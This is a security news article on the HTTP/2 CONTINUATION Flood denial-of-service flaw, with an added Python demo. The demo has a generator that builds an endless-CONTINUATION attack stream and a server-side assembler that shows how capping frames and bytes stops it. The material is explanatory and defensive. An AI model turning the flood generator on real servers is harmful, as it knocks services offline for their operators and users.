New findings have revealed a class of vulnerabilities in HTTP/2 implementations, specifically in their handling of the CONTINUATION frame, that can be exploited for denial-of-service (DoS) attacks.
Security researcher Bartek Nowotarski dubbed this technique the HTTP/2 CONTINUATION Flood and reported it to the CERT Coordination Center (CERT/CC) on January 25, 2024. According to CERT/CC's advisory of April 3, 2024, many HTTP/2 implementations do not properly limit or sanitize the number of CONTINUATION frames accepted within a single stream.
In essence, an attacker opens a stream and sends an unending sequence of CONTINUATION frames that never terminate the header block. An implementation that buffers every fragment until the block is complete keeps allocating memory until it crashes with an out-of-memory (OOM) condition. Implementations that do not append the fragments to the header list in memory are not necessarily safe either: each frame is still processed and HPACK-decoded by the server, so the attack turns into CPU exhaustion instead.
HTTP/2, like HTTP/1, carries header fields in requests and responses. The fields are organized into a header list, which is serialized into a header block; that block is then fragmented and transmitted in a HEADERS frame followed, if necessary, by CONTINUATION frames. The CONTINUATION frame, as defined in RFC 7540 (now superseded by RFC 9113), continues a sequence of header block fragments on the same stream, and the sequence only ends when a frame carries the END_HEADERS flag. The specification itself places no cap on how many CONTINUATION frames may follow a HEADERS frame; bounding them is left to each implementation.
Nowotarski highlights that the CONTINUATION Flood represents a more severe threat than previous vulnerabilities such as the Rapid Reset attack disclosed in October 2023. Detection is also harder: because the header block is never completed, no request ever finishes, so the malicious traffic may not appear in HTTP access logs at all.
At its core, the vulnerability arises from mishandling of a HEADERS frame followed by multiple CONTINUATION frames, leading to a DoS condition. An attacker exploits it by opening a new HTTP/2 stream against a vulnerable server and sending a HEADERS frame followed by an endless series of CONTINUATION frames, none of which sets the END_HEADERS flag. Depending on the implementation, this either drives the server out of memory or exhausts its CPU, in both cases affecting availability.
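To make the mechanism concrete, here is an added example (not code from the advisory or from any of the affected projects): a minimal HTTP/2 frame codec, an attacker-side generator that produces the HEADERS-plus-endless-CONTINUATION sequence described above, and a server-side header block assembler that can be run either unbounded, mirroring the vulnerable implementations, or with caps on accumulated bytes and frame count. The frame layout follows RFC 9113 section 4.1 and the HPACK literal encoding follows RFC 7541; the cap values, the filler header name `x-pad` and the function names are assumptions chosen for the demo, not any server's defaults or API.

```python
"""Added example (not code from any affected project): HTTP/2 CONTINUATION
Flood generator and a server-side header block assembler with optional caps.
Frame layout per RFC 9113 s4.1; cap values are demo assumptions."""
import struct

HEADERS, CONTINUATION = 0x1, 0x9          # frame types (RFC 9113 s6.2, s6.10)
END_STREAM, END_HEADERS = 0x1, 0x4        # flag bits on HEADERS / CONTINUATION
FRAME_HEADER_LEN = 9


def encode_frame(ftype, flags, stream_id, payload):
    """24-bit length, 8-bit type, 8-bit flags, reserved bit + 31-bit stream id, payload."""
    if len(payload) > 0xFFFFFF:
        raise ValueError("payload exceeds 24-bit length field")
    header = struct.pack("!I", len(payload))[1:] + struct.pack("!BBI", ftype, flags, stream_id & 0x7FFFFFFF)
    return header + payload


def parse_frames(wire):
    """Yield (type, flags, stream_id, payload); a truncated trailing frame is dropped."""
    off = 0
    while off + FRAME_HEADER_LEN <= len(wire):
        length = int.from_bytes(wire[off:off + 3], "big")
        ftype, flags = wire[off + 3], wire[off + 4]
        stream_id = struct.unpack("!I", wire[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = wire[off + 9:off + 9 + length]
        if len(payload) < length:
            break
        yield ftype, flags, stream_id, payload
        off += FRAME_HEADER_LEN + length


def hpack_literal(name, value):
    """HPACK 'literal header field without indexing, new name' (RFC 7541 s6.2.2),
    no Huffman coding; lengths kept below 127 so one 7-bit prefix byte suffices."""
    assert len(name) < 127 and len(value) < 127
    return b"\x00" + bytes([len(name)]) + name + bytes([len(value)]) + value


def well_formed_request(stream_id=1, split=False):
    """A normal GET in one HEADERS frame, or (split=True) legitimately spread over
    HEADERS + one CONTINUATION that sets END_HEADERS. Constructed sample input."""
    block = b"".join(hpack_literal(n, v) for n, v in (
        (b":method", b"GET"), (b":path", b"/"),
        (b":scheme", b"https"), (b":authority", b"example.com")))
    if not split:
        return encode_frame(HEADERS, END_HEADERS | END_STREAM, stream_id, block)
    half = len(block) // 2
    return (encode_frame(HEADERS, END_STREAM, stream_id, block[:half])
            + encode_frame(CONTINUATION, END_HEADERS, stream_id, block[half:]))


def continuation_flood(stream_id=1, n_continuations=10_000):
    """Attacker side: HEADERS without END_HEADERS, then CONTINUATION frames that
    never set END_HEADERS, so the header block never terminates. The x-pad
    filler is constructed junk (assumed name); the frame flags are what matter."""
    fragment = hpack_literal(b"x-pad", b"A" * 100) * 8   # 864 bytes per frame
    wire = bytearray(encode_frame(HEADERS, 0, stream_id, fragment))
    for _ in range(n_continuations):
        wire += encode_frame(CONTINUATION, 0, stream_id, fragment)
    return bytes(wire)


def simulate_server(wire, max_block_bytes=None, max_continuations=None):
    """Server-side header block assembly (RFC 9113 s4.3). With both caps None it
    mirrors the vulnerable behaviour: every fragment is appended with no bound.
    Returns the outcome, bytes buffered so far and frames consumed."""
    buf, stream, continuations, consumed = bytearray(), None, 0, 0
    for ftype, flags, sid, payload in parse_frames(wire):
        consumed += 1
        if stream is None:                         # first frame must open a block
            if ftype != HEADERS:
                return {"outcome": "PROTOCOL_ERROR", "buffered": len(buf), "frames": consumed}
            stream = sid
        else:                                      # block open: only CONTINUATION on the same stream is legal
            if ftype != CONTINUATION or sid != stream:
                return {"outcome": "PROTOCOL_ERROR", "buffered": len(buf), "frames": consumed}
            continuations += 1
            if max_continuations is not None and continuations > max_continuations:
                return {"outcome": "ENHANCE_YOUR_CALM", "buffered": len(buf), "frames": consumed}
        if max_block_bytes is not None and len(buf) + len(payload) > max_block_bytes:
            return {"outcome": "ENHANCE_YOUR_CALM", "buffered": len(buf), "frames": consumed}
        buf += payload
        if flags & END_HEADERS:                    # block complete: would now be HPACK-decoded and logged
            return {"outcome": "complete", "buffered": len(buf), "frames": consumed}
    return {"outcome": "still_buffering", "buffered": len(buf), "frames": consumed}


if __name__ == "__main__":
    flood = continuation_flood(n_continuations=10_000)
    print("unbounded:", simulate_server(flood))
    print("bounded:  ", simulate_server(flood, max_block_bytes=16384, max_continuations=32))
    print("legit:    ", simulate_server(well_formed_request(split=True), 16384, 32))
```

Run unbounded, the assembler consumes all 10,001 frames and is still buffering roughly 8.6 MB when the sample input runs out; a real attacker simply never stops, which is the OOM path. With caps the same input is cut off after a handful of frames with a connection-level ENHANCE_YOUR_CALM, while the split legitimate request still completes. Note also why the flood is invisible to access logs: only the `complete` branch ever yields a request object to log, so the place to record this condition is the connection error path, not the request log.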
Several projects, including amphp/http, Apache HTTP Server, Apache Tomcat, Apache Traffic Server, Envoy proxy, Go, the h2 Rust crate, nghttp2, Node.js, and Tempesta FW, are affected by this vulnerability. Users are urged to update to the latest versions; where a patch is not yet available, temporarily disabling HTTP/2 removes the exposure until one is.